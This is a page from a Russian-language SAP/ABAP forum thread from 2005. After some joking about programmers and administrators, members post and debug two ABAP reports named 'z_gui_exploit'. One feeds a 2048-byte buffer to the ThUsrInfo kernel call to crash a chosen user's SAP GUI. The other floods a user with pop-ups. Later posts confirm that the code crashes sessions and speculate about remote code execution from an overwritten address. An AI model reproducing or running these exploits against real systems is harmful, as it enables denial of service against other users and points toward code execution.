Текущее время: Чт, июл 31 2025, 17:27

Часовой пояс: UTC + 3 часа


Правила форума


ВНИМАНИЕ!

Вопросы по SAP Query и Quick View - сюда



Начать новую тему Ответить на тему  [ Сообщений: 68 ]  На страницу Пред.  1, 2, 3, 4, 5  След.
Автор Сообщение
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:20 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Skif написал:
"..было время и цены снижались.."


И текли, куда надо, каналы
И в конце куда надо впадали....

В.С. Высоцкий "Баллада о трудном детстве"
http://www.kulichki.com/vv/pesni/chas-zachatya-ya-pomnyu.html

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:27 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
vvvictor написал:
Zharik написал(а):
Если ты программер - да. :lol: :lol: :lol:

Если кодер - то просто придерживаться принципов оптимального кодирования :lol: :lol: :lol:

Иногда приходится в такие места залезать :!: :evil: :twisted: :twisted:

А творчество, в нашем деле, должно быть востребованно, оправданно и максимально безопасно. Это на руки можно надеть презерватив ответственности, а вот тем - из-за кого приходится лезть в дебри и не всегда безопасно - такой презик на мозги не натянешь :cry: :oops: :lol: :lol: :lol:

не так
отвественность/творчество
админ 90/10
пр-ст 10/90
(c)Skif
Но это больше для собеседования - чтобы максимизировать выработку впоследствии


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:29 
Менеджер
Менеджер
Аватара пользователя

Зарегистрирован:
Чт, май 26 2005, 11:36
Сообщения: 651
Откуда: Киев-Москва
Цитата:
Но это больше для собеседования - чтобы максимизировать выработку впоследствии

Немножко не понял к чему собеседование.

_________________
Рисую потоки данных.


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:31 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Skif написал:

отвественность/творчество
админ 90/10
пр-ст 10/90
(c)Skif
Но это больше для собеседования - чтобы максимизировать выработку впоследствии


100%

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:37 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
Zharik написал(а):
Цитата:
Но это больше для собеседования - чтобы максимизировать выработку впоследствии

Немножко не понял к чему собеседование.

Потому что абап и админство (вспомнилось гоблинский властелин))) - в порядке хобби - негоже старикам у молодёжи хлеб отнимать. А "собеседование" (не путать с рекрутёрским) - ну должность такая - текучка большая однако.
вот ещё один копирайт могу подарить:
Нет сегодняшних проблем - есть вчерашние ошибки" (на стене висит)


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:46 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Skif написал:
вот ещё один копирайт могу подарить:
Нет сегодняшних проблем - есть вчерашние ошибки" (на стене висит)

50/50, хотя в принципе все так
:lol:

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 18 2005, 14:57 
Старший специалист
Старший специалист

Зарегистрирован:
Пт, ноя 12 2004, 10:44
Сообщения: 370
Откуда: Москва
Интересная оказывается тема, если копать проблему дальше. Жаль нет дебаггера, но кажется тут дело идет до Remote Code Execution. :twisted: С успехом можно попробовать сорвать стек и выполнить на удаленной машине все, что захочется :) в поле user добавил obligatory умышленно, ибо если запустить с пустым полем действует как оружие массового опорожнения. :D Гуя в предсмертных судорогах пытается написать создателю (@sap.com) о случившемся :)

Code:
report z_gui_exploit.

include tskhincl.

parameters client like sy-mandt default sy-mandt.
parameters user like sy-uname obligatory default sy-uname.

data message(2048).
data xmes(2048) type x.
data message_len type sy-index.
data loc_cut_blanks type sy-langu value 0.
field-symbols <mes> type c.

start-of-selection.
  message_len = 2048.

  xmes(1) = '90'.
  clear xmes with xmes(1).
  assign xmes to <mes> casting type c.

  call 'ThUsrInfo'
    id 'OPCODE' field opcode_send_pop_up
    id 'CLIENT' field client
    id 'USR' field user
    id 'MSG' field <mes>
    id 'MSG_LEN' field message_len
    id 'CUT_BLANKS' field loc_cut_blanks.


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Ср, окт 19 2005, 15:05 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
holocron написал(а):
не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений :) проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит :)

Code:
report z_gui_exploit.

parameters uname type sy-uname obligatory.
parameters text type sm04dic-popupmsg.
parameters times type i default 50.
parameters mandt type sy-mandt default sy-mandt.

start-of-selection.
  do times times.
  call function 'TH_POPUP'
    exporting
      client = mandt
      user = uname
      message = text
    exceptions                                                             
      user_not_found = 1
      others = 2.
  enddo.

нифига не валит (( Открывается 3-5 окошек и всё...(40b)


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 15:18 
Старший специалист
Старший специалист
Аватара пользователя

Зарегистрирован:
Вт, авг 17 2004, 08:55
Сообщения: 331
Откуда: Украина, г.Мариуполь
Пол: Мужской
Зато код холокорна сработал на "ура!", только вместо
Code:
data xmes(2048) type x.
пришлось написать просто
Code:
data xmes(2048).

Иначе не компилировалось.


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 15:21 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
RoadRunner написал:
Зато код холокорна сработал на "ура!", только вместо
Code:
data xmes(2048) type x.
пришлось написать просто
Code:
data xmes(2048).

Иначе не компилировалось.
]
пробуем..))


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 15:28 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
RoadRunner написал:
Зато код холокорна сработал на "ура!", только вместо
Code:
data xmes(2048) type x.
пришлось написать просто
Code:
data xmes(2048).

Иначе не компилировалось.

"CASTING" is not expected. (( 40b старушка...


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 16:30 
Гость
раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048. :)


Принять этот ответ
Вернуться к началу
  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 17:18 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
holocrоn написал(а):
раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048. :)

вот млин, начальник транспортного цеха ушёл уже... (админ транспорта))


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 20 2005, 10:02 
Гость
Skif написал:
holocrоn написал(а):
раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048. :)

вот млин, начальник транспортного цеха ушёл уже... (админ транспорта))

всё ок. валит. )) впишу в заголовок автора ))


Принять этот ответ
Вернуться к началу
  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт, окт 21 2005, 08:40 
Гость
польщен )) Однако... написание полноценного эксплоита мне не под силу (полномочий нет :( ) Как вы понимаете дыркой можно пользоваться и без АБАПа. вот только без SoftICE сложно сказать, возможен ли Remote Execution или нет. когда строку чар пустую подсовываешь - адрес падения 0х20202020 :) т.е. пробелами перезаписан. а значит, что есть вероятность успешной инъекции кода. :) просто DoS-атака - не спортивно :)

Если SAP - месть немцев за проигрыш в войне (как писали в соседнем треде), то это месть за дедушку :D


Принять этот ответ
Вернуться к началу
  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 68 ]  На страницу Пред.  1, 2, 3, 4, 5  След.

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Русская поддержка phpBB